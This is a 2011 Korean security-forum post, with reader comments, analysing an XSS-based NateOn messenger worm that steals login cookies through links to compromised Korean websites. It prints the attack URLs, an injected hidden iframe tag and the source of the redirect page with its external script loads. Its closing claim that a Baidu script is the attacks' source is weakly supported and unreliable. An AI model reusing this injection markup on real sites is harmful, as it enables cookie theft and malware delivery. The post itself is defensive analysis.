1580, 1/79 회원가입  로그인  
   푸른하늘
   http://www.cyworld.com/hsbluesky
   신형 중국발 네이트온 해킹 분석

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1659 [복사]


안녕하세요.

네이트온을 하는 한 유저로써 !!! - _-
한번 신형 해킹기법을 분석해 보았습니다.



다들 아시다시피 한명이 뿌리게 되면 그 쪽지의 링크를 열어보게되고 100명중 30명은 초기에 당합니다. 70명은 대중의 소문으로 인지하고있구요. 30명은 잘 모르는 분들.

30명의 계정은 또 로그인이 되어 추가된 유저들에게 뿌리게 되고...
삽시간에 쪽지는 돌고 돌고 또 돕니다. 올레 ~

자 이제 실전입니다.


해당 링크에 네이트온 로그인 하시고 클릭하지마십시오.
- 실제 해킹 url -

http://www.ka%6Dc.co.kr/nzeo/view.php?id=news&no=132

Do not click !!!

자 이제 링크의 특성을 살펴 봅시다.

co.kr 국내 url 링크입니다.
ka%6dc  url encoding 으로 링크를 변조하였습니다.
%6D = m

본래 url - http://www.kamc.co.kr/nzeo/view.php?id=news&no=132 - Do not click !!!


http://www.kamc.co.kr/  국내 사이트가 되는군요.
현재 해당 사이트에 전화를 하여 해당 게시글 삭제 요청을 하엿습니다.



- 신형 기법 -

국내의 취약한 웹사이트에 script 게시글을 올리게 됩니다.
해당 악성 스크립트 게시글은 XSS기법의 스크립트입니다.

네이트온 로그인 상태로 해당 쪽지를 받아 해당 링크로 가게 되면 쿠키값들이 악의적인 서버로 전송 되게 됩니다.
여기서 대부분 2~3번 이상을 전송하게 됩니다만. 혹여 실패가 일어나거나 변조 된다하더라도 10개중 2개의 값이 이상하고 8번이 같다. 그럼 당연 확률적으로 8번이 맞는 말이 됩니다. 따라서 여러번 전송하도록 되어있습니다.

해당 사이트 링크에 접속하면 해당 사이트에 모두 존재하지 않는 악의적 플래쉬 파일을 자동으로 내리 받습니다. 또한 다른 방식으로는 현재 신형기법에서는 그렇지 않지만 Active X 를 요구한다거나 여러 요청들을 보내어 백도어를 심어 좀비 pc 로 만들어버립니다.

우리가 가장 주의해야 할건 더이상 퍼지지 않도록 이런 쪽지들이 오면 절대로 열어봐선 안된다는 것 입니다.
공격당한 링크의 웹사이트 스크립트는 이미 감염되여 열어볼 시 네이트온 로그인 상태의 쿠키값이 넘어가게 됩니다.

그리고 국내 웹사이트 운영하시는 분들이 알아야 할 사실 하나.

국외의 공격이라 잡기가 힘든건 사실상 ...
왜 국내 사이트로 굳이 하는 걸 까요 ?

국외에서 프록시를 몇 번 돌려서 국내 사이트에 다시한번 우회해서 접근하여 사이트 하나에 글을 올립니다.
그리고는 타겟들이 들어오게 된다면 공격은 국내 사이트 내에서 이루워진다고 보시면 됩니다.

한마디로 꿩대신 닭이라는 말입니다.


- 실전 소스 분석 -


저 위의 사이트에 삽입된 소스에서 추출해낸 다른 소스입니다.

iframe 를 이용한 태그입니다.

두번째 타겟이 된 사이트입니다. 교회 사이트이며 역시나 국내사이트입니다.
여러곳을 거치게 만들어 역으로 잡는 것을 힘들게하며 잡을만 하면 다른 방법으로 또 빠져나가는 미꾸라지들입니다.

<iframe frameborder=0 src=http://www.imchurch.net/bbs/data/sub1_8/index.html width=100 height=1 scrolling=no></iframe>

저기에 보이는 해당 링크로 접속해 보았습니다.

<html><head><!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->


<meta http-equiv="content-type" content="text/html; charset=euc-kr">
<title>로그인</title>
<link rel="stylesheet" href="../style.css" type="text/css">
</head><body topmargin="0" leftmargin="0">
<!-- 새창 대신 사용하는 iframe -->
<iframe src="main.html" frameborder="0" height="10" scrolling="no" width="100"></iframe>
<script type="text/javascript" src="in.js"></script>
<script type="text/javascript" src="http://www.npcn.or.kr/zero/data/index/ajax.js"></script><script src="%20http://hm.baidu.com/h.js?b41ce2a26206d693a01237d661513b7c" type="text/javascript"></script>

</body></html>


로그인의 페이지가 tittle 만 그렇습니다.

저 안에 또다른 링크가 또 뜹니다. 역시 접근을 해보았습니다.


var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fb41ce2a26206d693a01237d661513b7c' type='text/javascript'%3E%3C/script%3E"));


http://hm.baidu.com/h.js?b41ce2a26206d693a01237d661513b7c


http://baidu.com/  

... 중국 사이트입니다.

결국 요즘 계속해서 들어오는 중국발 해킹의 근원지는 이곳입니다.

다른 공격도 마찬가지입니다. 소스 분석결과 해당 사이트가 나왔음을 명백하게 밝힙니다.

긴 글 읽어주셔서 감사합니다.

우리나라 또한 아이티 강국인만큼 아이티보안에 힘써야 합니다.

우리모두 분발하여 성공합시당.

화이팅 !!

  Hit : 13015     Date : 2011/02/12 06:04



    
rkdgh0112 정말감사 ㄷㄷ..
원리가 궁금했었는데
2011/02/12  
starsol 감사합니다.

친구들한테서 이러한 쪽지 많이 왔는데,,,

암튼, 보안에 더욱 힘써야겠어요~
2011/02/13  
xodnr631 엇.. 저도 친구 3명에게 동시에 이런 문자가 와서 제 티스토리에 작성대기 중 이였는데..
어쨌든 좋은 내용이니 참고하고 가겠습니다~ ^^
2011/02/13  
U_SoRang cross-site scripting....이었군요....;;;;; 2011/02/13  
white-hacker 잘봤습니다^^ 7~8월에 이어서 또다시 기승을 부리네요 2011/02/14  
ganesha 화이팅! 2011/02/15  
lsykoh2 화이팅 중국 크래커들 다 잡아버릴거야 2011/02/15  
chachadl73 신종 XSS 이네요...좋은정보 감사합니다. 2011/02/16  
내가해커 오오,,,, 저가몰랐던 중국 크래커들분석 감사합니다 2011/02/22  
ijs1415 오..수고하셨습니다~
감사해요!
2011/06/15  
yswang17 우와....중국 싫어요 ㅠㅠ 2011/07/23  
salis 감사합니다. 2011/08/19  
     [공지] 강좌를 올리실 때는 말머리를 달아주세요^ㅡ^ [29] 멍멍 02/27 18277
1579   리눅스 커널 2.6 버전 이후의 LKM     jdo
07/25 209
1578   쉘코드 모음     해킹잘하고싶다
01/15 953
1577   Call by value VS Call by Reference     해킹잘하고싶다
01/15 436
1576   (꼼수) L.O.B 한방에 클리어하기[1]     해킹잘하고싶다
01/14 631
1575   towelroot.c (zip) 코멘팅.[1]     scube
08/18 3157
1574   levitator.c (안드로이드 루팅) 공격 분석 소스 코드 공유.[4]     scube
08/17 3165
1573   무료 정보보안 기술인재 양성 과정 교육생 모집     chanjung111
06/17 3918
1572   K-Shield 주니어 5기 모집     lrtk
06/17 3639
1571   [팁] 파이썬 2소스를 3으로 변경해주는 사이트[3]     한승재
05/13 3401
1570   구글 백링크 작업 질문요     wkatnxka
03/30 2933
1569   [팁] 우분투 미러링서버     한승재
03/09 3534
1568 비밀글입니다  감을못잡겠네요ㅜㅜ     잉잉잉
01/15 3
1567   데비안 계열 리눅스 의존성 깨졌을때 해결법     한승재
11/27 3946
1566   홍보합니다. 신생 보안커뮤니티입니다.     kimwoojin0952
10/26 3816
1565   신기한 프로그래밍 언어[3]     koreal33t
09/06 4166
1564   윈도우,리눅스에서 내 ip를 확인해 보자 [1]     koreal33t
09/06 3405
1563   CTF 사이트[1]     koreal33t
09/06 3982
1562   자격증 (문제)사이트 [2]     koreal33t
09/06 3849
1561   [퍼온글]리눅스 기본 명령어     한승재
06/06 4517
1 [2][3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2023 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com